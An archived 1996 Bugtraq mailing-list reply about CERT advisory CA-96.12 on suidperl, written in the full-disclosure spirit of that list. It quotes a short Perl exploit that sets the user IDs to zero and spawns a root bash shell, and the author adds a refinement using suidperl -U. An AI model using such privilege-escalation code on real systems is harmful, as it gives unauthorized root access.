[2843] in bugtraq
Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability
daemon@ATHENA.MIT.EDU (Rob J. Nauta)
Sun Jun 30 13:10:57 1996
Date: Sun, 30 Jun 1996 11:54:01 +0200
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Rob J. Nauta" <rob@brasaap.iaehv.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To: <Pine.LNX.3.91.960629021654.15516g-100000@inorganic5.chem.ufl.edu> from "Jon Lewis" at Jun 29,
96 02:24:49 am
>
> On Fri, 28 Jun 1996 ichudov@algebra.com wrote:
>
> >
> > What is the exploit?
>
> Run this as a suid or sgid script. It doesn't matter what user or group
> it's suid/sgid to...it gets root access.
>
> #!/usr/bin/perl
> $ENV{PATH}="/bin:/usr/bin";
> $>=0;$<=0;
> exec("/bin/bash");
I think it's not entirely correct. I was able to reproduce the bug
with #!/usr/bin/suidperl -U as the first line. You need the -U or else
suidperl will complain about an insecure function being used. I also
used system("/usr/bin/id"); which is more obvious to verify whether the
bug exists.
> Is it just me...or does it give people the willies knowing such an easy
> to exploit hole was on their systems...perhaps for years.
Certainly ! I mean, I first heard about this via the CERT advisory while
I am on most security lists. I guess via the PERL newsgroups/mailing
lists there was an earlier alert, which the bad guys could've gotten,
a bad one for all security folks ! Nothing on bugtraq or the -alert
lists, I guess many sites could have gotten hacked by people reading
PERL news. This just shows 1) CERT alerts aren't that bad, by reading
it I reproduced an exploit in minutes 2) security lists aren't everything,
don't rely on them too much 3) the usenet security newsgroups are just
entertainment and have no useful purpose for discussing new bugs, just
general 'what is a firewall?' questions 4) bugtraq doesn't really meet
its 'full disclosure' charter, nobody who knew the bug bothered to send
in an exploit.
I checked an internet provider and they had a new suidperl with a date
of june 2nd which was a safe one. I guess they have better sources than
me, which is always a disappointment.
Rob
--
/; ;\
__ \\____// From the keyboard of
/{_\_/ \`'\_/__ Rob J. Nauta
\;/ \___ (o\ /o } rob@nauta.it
__//_______________________/ :--' rjn@pobox.com
/ //######## #### \_ `__\
// ###### #### #### \___(o'o)
=/ ### ####### ### `===='
